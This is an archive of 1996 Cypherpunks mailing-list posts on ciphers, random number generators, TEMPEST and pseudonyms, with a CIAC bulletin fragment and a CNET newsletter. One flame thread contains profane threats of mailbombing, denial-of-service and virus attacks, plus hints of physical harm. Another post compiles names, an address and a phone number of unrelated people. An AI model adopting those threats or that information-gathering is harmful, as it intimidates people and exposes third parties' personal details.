> process, or service by trade name, trademark, manufacturer, or
> otherwise, does not necessarily constitute or imply its endorsement,
> recommendation or favoring by the United States Government or the
> University of California. The views and opinions of authors expressed
> herein do not necessarily state or reflect those of the United States
> Government or the University of California, and shall not be used for
> advertising or product endorsement purposes.
> 
> LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)
> 
> G-43: Vulnerabilities in Sendmail
> G-44: SCO Unix Vulnerability
> G-45: Vulnerability in HP VUE
> G-46: Vulnerabilities in Transarc DCE and DFS
> G-47: Unix FLEXlm Vulnerabilities
> G-48: TCP SYN Flooding and IP Spoofing Attacks
> H-01: Vulnerabilities in bash
> H-02: SUN's TCP SYN Flooding Solutions
> H-03: HP-UX_suid_Vulnerabilities
> H-04: HP-UX  Ping Vulnerability
> 
> RECENT CIAC NOTES ISSUED (Previous Notes available from CIAC)
> 
> Notes 07 - 3/29/95     A comprehensive review of SATAN
> 
> Notes 08 - 4/4/95      A Courtney update
> 
> Notes 09 - 4/24/95     More on the "Good Times" virus urban legend
> 
> Notes 10 - 6/16/95     PKZ300B Trojan, Logdaemon/FreeBSD, vulnerability
>                        in S/Key, EBOLA Virus Hoax, and Caibua Virus
> 
> Notes 11 - 7/31/95     Virus Update, Hats Off to Administrators,
>                        America On-Line Virus Scare, SPI 3.2.2 Released,
>                        The Die_Hard Virus
> 
> Notes 12 - 9/12/95     Securely configuring Public Telnet Services, X
>                        Windows, beta release of Merlin, Microsoft Word
>                        Macro Viruses, Allegations of Inappropriate Data
>                        Collection in Win95
> 
> Notes 96-01 - 3/18/96  Java and JavaScript Vulnerabilities, FIRST
>                        Conference Announcement, Security and Web Search
>                        Engines, Microsoft Word Macro Virus Update
> 
> - ----BEGIN PGP SIGNATURE-----
> Version: 2.6.1
> Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface
> 
> iQCVAwUBMpN8qrnzJzdsy3QZAQHpZgP/V+NTN7AwEtWCM46sSBMFnEuz0NxmN9X2
> DMOFnATcUSNvukXBPAMc3LMYmnjhp+CrqDyfQCWVBUaHDTmb3yKTTsexYev5alyd
> cSR4uZjQrMjO1pu16HG7BS+faxaP+E/FVEcbAof9a+tjX4aj9LTOM/Nt8Hb6Aazo
> eRHTBH+AYy4=
> =fBQM
> - ----END PGP SIGNATURE-----
> 
> ------------------------------
> 
>  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 25 Nov 1996 16:29:49 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: KILL cypherpunks !!!
In-Reply-To: <Pine.LNX.3.95.961125052017.6797B-200000@dhp.com>
Message-ID: <Pine.SUN.3.94.961125190244.23785A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Nov 1996, aga wrote:

> On Sun, 24 Nov 1996, Black Unicorn wrote:
> 
> dude, you put the cypherpunks list in the header again.
> You really want that list killed, do you not?


Yes, please kill us.

> > > Look dude, a Juris Doctor IS a Doctorate of Law.
> > 
> > Incorrect.
> > 
> 
> Look asshole; it says "LAW DOCTOR" -- that is what "Juris Doctor"
> means, stupid.  And I am about to stick the motherfucking Laws
> right up your cocksucking ASS!

Well, unfortunately the force of your will can't change fact.  Nor can the
use of profanity or caps.

> > One can obtain a Doctorate in Law, (As in Dr.) but it is generally a
> > pointless endeavor except in some civil law jurisdictions.  (Liechtenstein
> > is a good example, where many attornies have a Dr.Iur. (Dr.) while others
> > merely have a Lic.Iur. (J.D.) ).
> > 
> > A J.D. requires no dissertation.
> > A Doctorate in Law does.
> > 
> 
> Wrong.  A J.D. requires a 75 page moot-court dissertation which
> is always new legal research.

Funny, I got mine without preforming such research.
I think you better write to Harvard and Georgetown and tell them they are
in trouble.  Their requirements are nothing like this.

> > A J.D. is not a true Doctorate, and even if it were, it would not be the
> > only current valid "Doctorate" that you can "do" in "plain Law."
> > 
> 
> "Juris" means Law.  So Juris Doctor means "Law Doctor."

Ah, QED then, right?

And the Pawnee tribe must be from india cause they are called "Indians."

> > Georgetown, as an example, offers a Doctorate in Law degree which requires
> > a J.D., an LL.M. and three years of legal teaching experience simply to
> > qualify for the program.
> > 
> 
> that is irrelevant, and you are off-topic.

You claim that a J.D. and Doctorate in Law are the same degree.  I show
you a specific example which indicates otherwise, and it is irrelevant,
and off topic?

> > A Doctor of Judicial Science program is also available with many of the
> > same requirements.
> > 
> > Both programs require a dissertation and a defense of same.
> > 
> > San Marcos University is also known for an exceptional Doctor of Laws
> > program.
> > 
> > Incidently, LL.D.s are rare and generally useful only in European circles.
> > 
> 
> Europe is also irrelevant, and you keep missing the point here.
> You have added the cypherpunks list again, and that was forbidden.

Oh, I've been a baaad boy.
 
> > As usual, you have overextended your bounds and now find yourself swimming
> > in water over your head.
> > 
> 
> look asshole, you really want that list killed, do you not?
> I have no bounds, as you will soon learn.

I'm cowering from the big powerful hacker with a Doctorate in Law and such
scary words.

> > > > > Go and eat your swiss cheese, as that is apparently all you
> > > > > are good for.  My mercenaries are too busy to go to europe
> > > > > right now.
> > > > 
> > > > I prefer Chedder.
> > > > 
> > > > Be careful who you threaten.  It might get you in trouble.
> > > > 
> > > 
> > > Threatening to wipe out your location on the InterNet is
> > > not against ANY law whatsoever, and I can mailbomb you, do
> > > a DOS attack, fork-bomb attack and virus attack against you,
> > > all of which are perfectly legal.
> > 
> > Actually, they are not.  Unauthorized access of a computer system is a
> > crime.  Anyone who had a "doctorate" in law would know this.
> > 
> 
> WRONG!  There is NO crime which covers anything that one does
> internationally!   And mailbombing is NOT "Unauthorized access,"
> regardless of where it occurs!

Study up on situs of a criminal act and jurisdiction please.

> 
> > I doubt your reference to mercenaries was merely a threat to my system,
> > but keep pushing if you like.
> > 
> > > > > Look asshole, I graduated from Law School with a Doctorate
> > > > > in 1975.  Now just go away and stop interfering with our
> > > > > American Net.
> > 
> > Which law school?  And did you do a dissertation?  What is its title?  Do
> > you practice?  What state are you licensed in?
> > 
> 
> Pitt-1975; Dissertation was in 1983 actions.  I practiced for
> six years, and then became perfect.

Which is why the Pennsylvania bar decided you had to be disbared.  I see.

> I currently do not practice for
> any parties other than myself, family, corporation or Institutes,
> and I need no license for that.

Good thing too or you'd be fined for practicing without a license.

> And since I do not carry any
> license from any State, there is NOTHING that you can do to stop me.
> The State disciplinary board has no jurisdiction, nor does any
> Law.

You seem quite familiar with the disciplinary boards proceedures.  I think
a query for their records might be interesting.  Perhaps it would make an
entertaining post.


> A Criminal Lawyer is a specialist in ripping new assholes
> on the witness stand.

Clearly you were never a criminal lawyer.

> This is a world-wide internet problem that you are about to get
> taken care of.  You will be among the first locations to be
> eliminated.  And just remember that your termination is your own
> doing.  You had your chance to keep the fucking cypherpunks list
> OFF of your e-mail to me, and blew it.

Oops, now what will I ever do?

> I pump iron and run three times a week.  And as a Tae Kwon Do
> black belt holder, I get lots of physical activity. I am in
> better physical shape than any other man that you know.

I have a date this weekend already, thanks.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 25 Nov 1996 16:48:25 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [Noise] Re: Thanks/was:This is your last warning
In-Reply-To: <T3cyXD31w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961125193434.24149A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Mon, 25 Nov 96 09:07:16 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> To: cypherpunks@toad.com, freedom-knights@toad.com
> Subject: Re: [Noise] Re: Thanks/was:This is your last warning
> 
> Black Unicorn <unicorn@schloss.li> writes:
> <stuff>
> 
> I was curious about BU's choice of domain name - after all, schloss.li is the
> same box as polaris.mindport.net in Norwich, CT. So I ran an altavista search
> on schloss*. Like, wow! There are thousands and thousands of Web pages with
> schloss* in them, and most of them may have nothing to do with Black Unicorn.

You could easily have saved the time with a german dictionary.
Schloss means castle, or fort.  I didn't select the domain name.

Schloss was originally set up for use out of Vaduz, but plans changed and 
I returned to the D.C area.  Since I'm in the U.S. it points to mindport
now, when I move back overseas, it will follow.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 25 Nov 1996 21:30:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <848946795.108071.0@fatmans.demon.co.uk>
Message-ID: <FL8yXD37w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:

>
> >      The algorythm cannot be considered secure until it has been
> > peer-reviewed. They refuse to release the algorythm for review, simply sayi
> > that "you can't break the code" therefore "it is secure".
>
> This isn`t strictly true. Don Wood (spit) has actually released the
> algorithm details for review.

What did poor Don Wood do to deserve the (spit) after his name? Is he a liar
and a content-based plug-puller, like John Gilmore (spit)? Is he an ignorant
pseudo-cryptoid like Paul "Brute Force Attack on One-Time Pad" Bradley (spit)?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 26 Nov 1996 09:48:41 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: IPG Algorith Broken!
Message-ID: <849030317.93771.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



 Known-plaintext:   Unbreakable, since the pad is never reused
 Chosen-plaintext:  Unbreakable, ditto
 Adaptive-chosen-plaintext: Unbreakable, ditto

Correct but for a different reason. Re-using the pad does render the 
security useless but the other reason is if we know part of the pad 
AND the ciphertext (and hence the plaintext) or part of the plaintext 
and the ciphertext and therefore the pad, We cannot solve the rest of 
the ciphertext as the pad is true random and the next bits are 
independent of all the previous ones so we cannot predict from what 
we have.

A better definition of unbreakable, IMHO, is that there is no way to 
determine the plaintext given unlimited ciphertext and computational 
resources. Sure, this isn`t a complete definition but at least it 
definites perfect security in an analytic sense.



 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 26 Nov 1996 09:55:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <849030305.93656.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > Ahh... an OTP isn't unbreakable.  Its just so encredibly breakable that
> > you never know which break was the correct one ;)
> 
> Note that Schneier says "perfect", not "unbreakable".

yes,

Perfect is a better term. Strictly speaking it is because there is no 
finite unicity distance (the amount of ciphertext with which the 
cipher can theoretically be broken). So, stricly speaking, for a given 
message C and a prospective pad, P, out of a set of N pads which may 
or may not be correct:

P(P|C) = N^-1

The length of C and the amount of ciphertexts given have no effect in 
determining the key, nor is there any prospect of a know plaintext 
attack as the pad is true random and the next bits are totally 
independent of any others before them.
Of course the reason it is perfect is because there are many 
different pads which give valid decryptions and there is no way of 
knowing which one is correct.

IPG`s algorithm is definitely NOT an OTP and Don Wood is a snakeoil 
merchant.


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 25 Nov 1996 21:04:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: market for hardware RNG?
Message-ID: <199611260503.VAA27444@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm considering building a PCB to make a hardware random number generator.  
My first impression is that it will consist of a reverse-biased zener (for a 
broadband source of uncorrelated white noise) driving one of those one-chip 
FM recivers, with the audio output driving an 8-10 bit flash A/D convertor.  
Fairly simple.  For cryptologic applications, the output would have to be 
hashed down to a somewhat smaller output of bits since not all outputs are 
equally probable, but I suppose after such massaging it could produce at 
least 2 bits of randomness per sample at a 10 kilosamples per second or so, 
possibly much more with a wideband receiver chip.

But on thinking about this a little more, I began to wonder if anybody 
really wants this.  Pessimistically, it occurs to me that:

1.  Many if not most people don't even understand why a hardware RNG is 
desirable.

2.  Users of programs like PGP today already get at least a fairly decent 
RNG already.  Would they want better?  (I'm not suggesting a total 
replacement; I assume that the output of any hardware RNG would be hashed 
with more "traditional" PC sources, like disk timings, keyboard timings, 
etc, which should deter attempts to attack just the hardware part.)

3.    Even hardware RNG's aren't "perfect":  they could be subverted, 
replaced, or perhaps influenced.  Would someone who was sufficiently 
sophisticated as to recognize the need for it actually accept a real, 
functioning device?


On the other hand... if this kind of pessimism had infected Phil Zimmermann 
before he wrote PGP 1.0, he might have deleted the first 50 lines of code, 
erased the file, and said, "fuck it!"





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 25 Nov 1996 19:14:07 -0800 (PST)
To: wombat@mcfeely.bsfs.org (Rabid Wombat)
Subject: Re: wealth and property rights
In-Reply-To: <Pine.BSF.3.91.961125154224.10423A-100000@mcfeely.bsfs.org>
Message-ID: <199611260331.VAA00208@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>Yup. I agree with you here - every year Forbes puts out its list of the
>>>fairly leveraged with mortgages and other loans, so their true net worth
>>>is not all that high.
>>>The "coupon-clipping" class is mostly "old money."
>>Well since so many people are commenting on it, I'd better explain.  I have
>>heard a number of times that of all the millionaires in this country, the vast
>>majority of them are first-generation millionaires.  I'll certainly admit that
>>that's different than saying most of the wealth is first-generation wealth.  And
>>sorry, but I can't give a specific source.
> I have no doubt that the above is correct - but a million ($) just isn't
> what it used to be. Even if all the "millionaires" are 1st generation
> wealth, the million+ -aires certainly aren't. 

     Bill Gates. Sam Walton. 

     2 very large examples. Waltons heirs got most of his wealth, so they 
are second generation. 

     While it may be that "most" of the wealth is controlled by few entities,
exactly _what_ are those entities, and what does that wealth consist of? 

    Real estate? Money in the bank? -or- things like stocks, bonds, and 
other _investments_? 
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 25 Nov 1996 21:55:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: The dish on TEMPEST
Message-ID: <Pine.3.89.9611252135.A18061-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


The following is from a tread involving a friend of mine. An ex-military 
fellow. Take it for what you want. I believe him.



>>>     This depends in large part on the strength of the
>> >     degausser and how long it remains powered up.  The one
>> >     I have I used to "clean" 10.5 inch tape reels written
>> >     at FM broadcast quality to a noise level -20db down from
>> >     brand new tape - this back in my quadraphonic stereo
>> >     days.  It will not quite suck satellites out of orbit...
>> >     TWA planes, maybe.
>> 
>> 
>> -20dB down from new would be a better spec if new tape was typically 
>> nulled rather than just blank low-level white noise.
>> 
>> However, even so, a SQUID is a very scary thing....


    I've been out of commission for a week and found 276
    messages in my in-box today.

    The tapes I was writing about were those already
    "prepared" for recording "items of interest", and
    had already been degaussed in the preparation
    procedure to FM broadcast standards then/there.
    My little hummer would take whatever whit noise
    remained even then to a further 20 dBA DOWN from 
    the ridiculous levels then/there specified.

    In other words, it's pretty good.  Of course,
    IF Big Brother wants, there are any number of ways
    for him to obtain whatever information he wishes.

    I recall long, long ago, I was privileged to watch
    a demo of equipment (1955 or 1956, I forget exactly)
    in a truck parked a MILE away from our CommCenter,
    in the years before Faraday cages, TEMPEST, etc., 
    and watch these guys print out a 5x5 copy of our
    top secret traffic as it was read by the [elided upon request]
    one-time-tape encryption devices.

    Shortly after that demo, our CommCenter was moved 
    into a cave (no joke) and modified to "low level"
    dc signalling voltages.  And other measures were taken to 
    screen the area...

    I _have_ led an interesting life...


    As for Squids, only if you read Jules Verne are
    they scary. Otherwise, cleaned and fried with 
    a tangy dipping sauce,  well, that's another story!

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Wilson <serw30@laf.cioe.com>
Date: Mon, 25 Nov 1996 19:06:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: KILL cypherpunks !!!
Message-ID: <1.5.4.32.19961126030705.00815840@gibson.cioe.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:28 PM 11/25/96 -0500, you wrote:
>On Mon, 25 Nov 1996, aga wrote:

< whole bunch of stuff >  

>> This is a world-wide internet problem that you are about to get
>> taken care of.  You will be among the first locations to be
>> eliminated.  And just remember that your termination is your own
>> doing.  You had your chance to keep the fucking cypherpunks list
>> OFF of your e-mail to me, and blew it.
>
>Oops, now what will I ever do?

Wow, I'm going to miss cypherpunks. I didn't post much, but I've always
been an avid reader (sniff). If I only had it to do all over again...
Oh, by the way, since you're planning on doing away with things, could you 
get rid of some of these outfits that do the mass e-mails, thanks in advance.


>> I pump iron and run three times a week.  And as a Tae Kwon Do
>> black belt holder, I get lots of physical activity. I am in
>> better physical shape than any other man that you know.
>
>I have a date this weekend already, thanks.

I find you're martial arts reference very interesting. But if you were truly
any good, you wouldn't be waving it in everyones face like a banner. I find
your demeanor to be that of someone that has never practiced the warrior
arts. If you had, you'd have developed more respect for your fellow human
beings. 
        I'm guessing you're a very lonely person, whos only way of getting
attention is to try and cause a conflict. Share your pain with us, and
together we'll grow stronger ( Star Trek reference ;)). But if you can't do
that, shut 
off your computer ( or leave your terminal), and go find someone to talk to,
like a counselor. 


Eric Wilson
-----------------------------------------------------------------
Join the BugList! 
"How many times?" The Blind Man  
http://case.cioe.com/~serw30





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 25 Nov 1996 22:19:44 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [Noise] Re: Thanks/was:This is your last warning
In-Reply-To: <T3cyXD31w165w@bwalk.dm.com>
Message-ID: <329A8BEA.FD9@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> Black Unicorn <unicorn@schloss.li> writes:
> I was curious about BU's choice of domain name - after all, schloss.li is the
> same box as polaris.mindport.net in Norwich, CT. So I ran an altavista search
> on schloss*. Like, wow! There are thousands and thousands of Web pages with
> schloss* in them, and most of them may have nothing to do with Black Unicorn.
> E.g., did you know that Leah Rabin's maiden name was Schlossberg?
> There's a Robert Lev Schlossberg <robby@gwis2.circ.gwu.edu>.
> One George Schlossberg, an attorney with Cotten and Selfon, was quoted on NPR.
> Another attorney's name comes up on several interesting bankrupcy cases:
> Schlossberg and DiGirolamo, P.A.
> Roger Schlossberg
> 134 West Washington St.
> Hagerstown, MD 21740
> 301-739-8610
> A Neil Schlossberg graduated ca 1965 from Aiglon College, a boarding school in
> Switzerland.
> A Herbert Schlossberg, born in 1935, says this about himself:

[snip]

Isn't Caroline Kennedy married to a Schlossberg, or something very similar?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 25 Nov 1996 19:27:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
In-Reply-To: <199611252028.MAA16855@vishnu.corsair.com>
Message-ID: <Pine.LNX.3.95.961125222558.1418A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 25 Nov 1996, Dana W. Albrecht wrote:

> I'm interested in the current state of research (if any) on this topic.  
> Other than what John Young sent to the list some time ago about Lattice 
> stuff --- which is certainly far from prime time --- I've not seen 
> anything else.  I also haven't devoted a lot of time to looking.
> 
> Relevant pieces of the earlier thread are included below.
> 
> Comments, anyone?

Matt Blaze did some work on NP-complete Feistel ciphers.  I don't know much
about the details.  The paper is at ftp.research.att.com/dist/mab/turtle.ps

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMppkIizIPc7jvyFpAQFzYQf7BM9AZR0I7FWEbnvtmBZPYiW4xUARRpTL
eqoeDuA474PMenN/iEYUTRilxfdvUycBgBXLav8RaE+ZYLUuqu3G5uixsM0iwT+5
3nma1/xtNwv9F420nacWDzzSFatg77/SnbsaJ6/EFROHgy8EAz/cie5cZEtCkPJe
s6BFEe32deHHCqlzFamoCE+8UOtyOtGeBtyX4prC/+RfUI0UMU6PXiD1LicvA5C7
cEE7/K4qb8ku7+3qcp1LE47iN0Icuy8xK9N3oX6B00XxwzYX7kqmV4wDRbE0DxcP
O7cmrE395Y+J2w4VenDMw65XLI6Cp1INK2Ev+3/c4Nf+FNaQ/I8jRw==
=xvkT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Mon, 25 Nov 1996 19:28:53 -0800 (PST)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: IPG Algorith Broken!
In-Reply-To: <3.0.32.19961124120423.00dc1358@mail.teleport.com>
Message-ID: <Pine.LNX.3.95.961125222418.81A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Nov 1996, Alan Olsen wrote:

> >Actually, rather clever if you're trying to estlablish reputation.  Just
> >make sure you use the right key.

very true 

> Reputation is not the only reason to use a "name" with an anon remailer.
> Sometimes you want to post (and have a reputation) that is entirely
> seperable from your "real life" persona.  Maybe you have a job where being

Stay with one nym long enough and the opposite may become true.  I've used
this nym for so long -- though not in these circles -- that I elected to
associate my true name with it.  The nym had far more built-up repuation
that my true name ever would.  (Of course, that's all meaningless here.)

Besides, I *like* the nym.  There is that psychological component of playing
with an alter-ego.  A lot can be said and done behind the veil of a nym that
might not be otherwise.  While many see this a threatening condition I have
always viewed it as an advantage.  Furthermore, it is a somewhat ironic
avenue to truth.  Politeness is not always conducive to getting to the heart
of an issue; nyms have little need for politeness or sugarcoating.

> Cypherpunks is gated to a number of Usenet News servers.  (Teleport is a
> good example.)  It is also archived in a number of search engines.
> (Altavista if I remember correctly, is one of them.)  Someone who does not
> want their words to come back any byte them might just use such a method to
> protect themselves.

And I would assume another nym in such a circumstance.

_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 25 Nov 1996 22:39:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Provably "Secure" Crypto (was: IPG Algorithm Broken!)
In-Reply-To: <199611252028.MAA16855@vishnu.corsair.com>
Message-ID: <v03007800aec03fd247fd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 PM -0500 11/25/96, Mark M. wrote:

>Matt Blaze did some work on NP-complete Feistel ciphers.  I don't know much
>about the details.  The paper is at ftp.research.att.com/dist/mab/turtle.ps

Matt described some of his (preliminary) results at an evening crypto
session at the Hackers Conference. The motivation was that secret key
ciphers, with the exception of one time pads, tend to be based on crufty,
ad hoc mechanisms, without any kind of provable security (again, with the
exception of true one time pads, which are of course known to be
information-theoretically secure).

It didn't seem to me that Matt had completed his work, and I don't believe
that any usable cipher has resulted (usable in the sense of being a
distibuted, ready to deploy cipher). He mentioned speeds comparable to DES.

Several people in this thread have commented on how nice it would be to
have a cipher provably as "good" as NP-complete problems are "hard"
(loosely speaking).

A noble goal. This was actually a motivation for the Founding Fathers of
Modern Cryptography, of course. Merkle, for example, believed that certain
"puzzle problems" could be used, with the security engendered by
NP-complete problems. The knapsack problem, generally, for example. It
turned out of course that the specifics of the proposed knapsack problem
implementations were not really fully equivalent to the general knapsack
problem, and were in fact breakable.

This is worth bearing in mind. Even if a problem is NP-complete, a
cryptosystem based on it may (and historically, _will_) often fail to be as
strong.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Osborne <osborne@gateway.grumman.com>
Date: Mon, 25 Nov 1996 19:46:44 -0800 (PST)
To: cypherpunks mailing list <cypherpunks@toad.com>
Subject: Need info on non-OS specific random functions (pref C++)
Message-ID: <3.0.32.19961125224604.0091fec0@gateway.grumman.com>
MIME-Version: 1.0
Content-Type: text/plain


I am looking for information on non-OS specific RNGs. Nothing really
complex, just easily portable to a few different OSs and compilers.  Any
pointers would be appreciated.
Thanks!


Rick Osborne / osborne@gateway.grumman.com / Northrop Grumman Corporation
-------------------------------------------------------------------------
Q: How many surrealists does it take to screw in a lightbulb?
A: Two.  One to hold the giraffe and the other to fill the bathtub with
brightly colored machine tools.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The CNET newsletter <dispatch@cnet.com>
Date: Mon, 25 Nov 1996 23:10:02 -0800 (PST)
To: Multiple recipients of list NEWS-DISPATCH             <NEWS-DISPATCH@DISPATCH.CNET.COM>
Subject: CNET News Dispatch  November 25th, 1996
Message-ID: <199611260654.WAA21502@cappone.cnet.com>
MIME-Version: 1.0
Content-Type: text/plain


*************************************

CNET NEWS DISPATCH
Monday, November 25, 1996
San Francisco, California, USA

*************************************

CNET NEWS DISPATCH is a daily newsletter that summarizes the up-to-the
minute technology news presented by CNET's NEWS.COM. It tempts readers with
coverage of today's hottest stories, news in the making, (in)credible
rumors, and other indispensable information.

For complete versions of the stories updated all day long, head over to:

   http://www.news.com/?nd

*************************************

CONTENTS

SCOOPS AND TOP STORIES

    Mother of all notebooks to be shot out of Canon in December
    The Web version of driving your car at blazing speeds of up to 325mph
    Death, where is thy...ping?(?)
    "Honey? Could you answer the toaster? I'm talking to Frank on the
    microwave."
    Comdex sucks! No, it rules! Sucks! Rules! Does not! Does so!
    Oh, so that's why O.J. has that battered copy of Neuromacer

ANNOUNCEMENTS
     An easy way for you to customize NEWS.COM
     Search the site for particular topics and articles
     Send us your questions, comments, flotsam, and jetsam
     How to subscribe and unsubscribe
     Late-breaking stories just a click away with Desk Top News

*************************************

SCOOPS AND TOP STORIES

MOTHER OF ALL NOTEBOOKS TO BE SHOT OUT OF CANON
Here are some numbers that might keep ThinkPad and PowerBook vendors up late
at night: 200-MHz Pentium processor, 13.3-inch active-matrix display, 1.4GB
hard drive, 8X CD-ROM drive. These formidable figures apply to Canon's
3200FX notebook, appearing in December at a showroom near you. It should
thus become the highest-performance notebook on the market --but is it worth
the price?...

   http://www.news.com/News/Item/0%2C4%2C5692%2C00.html?nd

*************************************

THE WEB VERSION OF DRIVING YOUR CAR AT 325 MPH
Have you been impressed by Peak Technologies' Peak Net.Jet, whose creators
have dubbed it the "turbocharger for the Internet"? If so, keep an eye on
the horizon for Datalytics' Web accelerator, Blaze, which will supposedly
let users surf the Web up to five times faster than they do today. The
company claims that four key weapons in Blaze's arsenal give it the edge
over existing accelerators, not to mention a team of blue-chip bundling
partners...

   http://www.news.com/News/Item/0%2C4%2C5707%2C00.html?nd

*************************************

DEATH, WHERE IS THY...PING?(?)
Maybe you've never been pinged. Maybe you've never known the feeling of
being on the business end of a huge chunk of data that overwhelms and then
shuts down your machine. But if it DOES happen to you (as Karl Malden used
to say), what will you do? What WILL you do? StorageTek's Network Systems
Group claims it has the magic bullet that is a mere four lines long and
takes only seconds to download...

   http://www.news.com/News/Item/0%2C4%2C5708%2C00.html?nd

*************************************

"HONEY? COULD YOU ANSWER THE TOASTER?
I'M TALKING TO FRANK ON THE MICROWAVE..."
Even before the appearance of the much-awaited "information appliances" that
are supposed to help us live like the Jetsons, Mitsubishi Electric America
and Diba are trying to drive down their cost by as much as half using new
chip technology. Some of the miracle gadgets expected include set-top boxes
with email and Web access, Internet-enabled phones with touch-screen
interfaces, and a "tour guide" device with a CD-ROM and built-in camera that
visitors could use in self-guided tours of museums and exhibits. Oh, and
don't forget to ask for the exciting "Toast Waiting" feature...

   http://www.news.com/News/Item/0%2C4%2C5704%2C00.html

*************************************

COMDEX SUCKS! NO, IT RULES! SUCKS! RULES! DOES NOT! DOES TOO!
If you've been to Comdex and survived, how did you manage it? NEWS.COM wants
